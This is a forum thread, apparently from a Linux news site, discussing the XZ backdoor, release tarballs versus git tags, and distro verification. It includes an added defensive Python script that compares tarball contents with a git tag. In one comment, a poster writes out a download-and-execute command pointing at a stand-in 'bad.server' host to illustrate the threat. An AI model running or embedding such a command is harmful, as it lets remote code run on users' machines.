XZ Struck By Malicious Code That Could Allow Unauthorized Remote System Access

  • tesfabpel
    Junior Member
    • Oct 2013
    • 17

    #11
    Originally posted by darkbasic View Post

    It's the *source* tarball which contains the final piece of the malicious code, not the binaries. It's no coincidence that starting from today Arch Linux switched to the git tag lol
    Probably it's the extra assets that are published on the release page on GitHub (the ones named differently from "Source Code (zip)" and "Source Code (tar.gz)"), since the standard two download from ".../archive/refs/tags/v5.6.1.{tar.gz,.zip}" instead of ".../releases/download/v5.6.1/xz-5.6.1.{tar.gz,.zip}".

    Probably the ones from "refs/tags" are built automatically by GitHub when downloading them (they don't even have the size visible in the page).



    Comment
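A check in the spirit of the point above (a release tarball is not the same thing as the git tag it claims to come from): walk the tarball, hash every file, and diff it against the tree the tag actually contains. This is an added example, not code from the thread or from the xz project; the archive and tree contents are constructed inline with placeholder names, so it runs offline. In practice you would feed it the downloaded tarball and a `git archive` export of the tag.

```python
import hashlib
import io
import tarfile
from typing import Dict, List


def file_digests_from_tarball(data: bytes) -> Dict[str, str]:
    """Map each regular file in a .tar.gz (top-level directory stripped) to its SHA-256."""
    digests: Dict[str, str] = {}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            # Release tarballs wrap everything in "name-version/"; drop that prefix.
            rel = member.name.split("/", 1)[1] if "/" in member.name else member.name
            payload = tar.extractfile(member).read()
            digests[rel] = hashlib.sha256(payload).hexdigest()
    return digests


def compare_to_tag(tarball_digests: Dict[str, str], tag_files: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Report files the tarball adds, drops, or alters relative to the tagged tree."""
    tag_digests = {p: hashlib.sha256(b).hexdigest() for p, b in tag_files.items()}
    common = tarball_digests.keys() & tag_digests.keys()
    return {
        "extra": sorted(set(tarball_digests) - set(tag_digests)),     # only in the tarball
        "missing": sorted(set(tag_digests) - set(tarball_digests)),   # only in git
        "modified": sorted(p for p in common if tarball_digests[p] != tag_digests[p]),
    }


def build_tarball(prefix: str, files: Dict[str, bytes]) -> bytes:
    """Build an in-memory .tar.gz with the usual 'name-version/' prefix (constructed input)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, content in files.items():
            info = tarfile.TarInfo(name=f"{prefix}/{path}")
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


# Constructed sample data: what the tag holds vs. what the "release" ships.
TAG_TREE = {
    "configure.ac": b"AC_INIT([pkg], [1.0])\n",
    "src/main.c": b"int main(void) { return 0; }\n",
    "m4/helper.m4": b"dnl helper macro\n",
}
RELEASE_TREE = dict(TAG_TREE)
RELEASE_TREE["configure"] = b"#!/bin/sh\n# generated script, never committed\n"
RELEASE_TREE["m4/helper.m4"] = b"dnl helper macro\ndnl extra line not in git\n"


def audit_constructed_release() -> Dict[str, List[str]]:
    tarball = build_tarball("pkg-1.0", RELEASE_TREE)
    return compare_to_tag(file_digests_from_tarball(tarball), TAG_TREE)
```

Anything under "extra" or "modified" is exactly the material a reviewer of the git history never saw, which is where a tarball-only payload would have to live.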

    • RealNC
      Senior Member
      • Jul 2008
      • 4247

      #12
      Why don't they use CI to create the release tarballs? Or do they? CI infra compromised then?

      Comment

      • bug77
        Senior Member
        • Dec 2009
        • 6526

        #13
        Originally posted by avis View Post
        Almost all distros, aside from maybe RHEL, rush to push upstream packages without ever verifying that the source code has not been tampered with.

        ...

        This is not an XZ issue. This is the issue of the entire Linux ecosystem. The issue of safety, security, trust and verifiability.
        The ecosystem is fine tyvm.

        "Almost all distros" do not rush to push the latest and greatest. Even rolling releases have unstable and testing repositories. Enterprise grade distributions are based on consumer facing counterparts that validate packages further. It's actually a very healthy setup. This was injected on Feb 24 and fixed a few days over a month later. That's pretty good in my book.

        Comment

        • Volta
          Senior Member
          • Apr 2019
          • 2310

          #14
          Originally posted by avis
          roliverio

          There have been zero instances of Microsoft/Apple/Google distributing malware in their entire 30+ year history. If you're concerned about "telemetry" it's different. It doesn't allow these companies to fuck with your systems or gain unauthorized access like in this situation.
          Yeah fking right!

          Be careful the next time you download a game off the Microsoft Store on Windows, as there's dangerous malware hiding in clones of several popular games. Before you download anything, make sure it's the actual app and not a fake.

          According to the security research firm Check Point (via Bleeping Computer), there are clones of popular games like Temple Run and Subway Surfers appearing on the Microsoft Store that contain the Electron Bot malware.

          The malware is a backdoor that gives the attacker complete control over infected machines with the goal of social media promotion and click fraud through Facebook, Google, YouTube, and Sound Cloud.
          Good luck checking their code!

          Oh, so-called 'telemetry' is malware introduced by the vendor himself.

          Comment

          • bug77
            Senior Member
            • Dec 2009
            • 6526

            #15
            Originally posted by avis
            roliverio

            Blacklisted immediately and goodbye. There have been zero instances of Microsoft/Apple/Google distributing malware in their entire 30+ year history. If you're concerned about "telemetry" it's different. It doesn't allow these companies to fuck with your systems or gain unauthorized access like in this situation.
            You probably missed the days when developers were urging Microsoft to keep VB out of the Office suite. They didn't and created a prime vector for a whole new generation of malware that did not exist before.

            Comment

            • avis
              Senior Member
              • Dec 2022
              • 2274

              #16
              Originally posted by bug77 View Post

              You probably missed the days when developers were urging Microsoft to keep VB out of the Office suite. They didn't and created a prime vector for a whole new generation of malware that did not exist before.
              This is 100% unrelated and VB was a single toggle to switch/disable and not deal with possibly malicious macros, if you ever were concerned about this attack vector.

              That roliverio guy heavily implied and joked about MS/Apple/Google actually distributing malware (an interpreter is not malware, cause otherwise a compiler in your distro is ALSO an attack vector, and Python gets installed by default in pretty much all distros) and I'm sad these companies won't sue him for libel.
              Last edited by avis; 29 March 2024, 01:35 PM.

              Comment

              • archkde
                Senior Member
                • May 2019
                • 702

                #17
                Originally posted by RealNC View Post
                Why don't they use CI to create the release tarballs? Or do they? CI infra compromised then?
                Now if they used a build system that doesn't require running random binaries distributed in the "source" tarball, this kind of "release tarball" would not be needed at all.

                Comment

                • archkde
                  Senior Member
                  • May 2019
                  • 702

                  #18
                  Originally posted by uxmkt
                  You dense MF. They would have done the same, just with different syntax.
                  No, because with CMake you only run the source code, not random binaries.

                  Comment

                  • oibaf
                    Senior Member
                    • Feb 2008
                    • 1223

                    #19
                    All the details are here: https://lwn.net/ml/oss-security/2024...3.anarazel.de/

                    Comment

                    • avis
                      Senior Member
                      • Dec 2022
                      • 2274

                      #20
                      Originally posted by archkde View Post

                      No, because with CMake you only run the source code, not random binaries.
                      The build system is irrelevant. You can obfuscate whatever you want and run wget https://bad.server/script.sh && sh script.sh and do whatever you please.

                      All the code Linux distros include must be manually inspected (and run through automated systems as well, since people don't always catch/see everything) and verified for being safe, period.

                      Comment
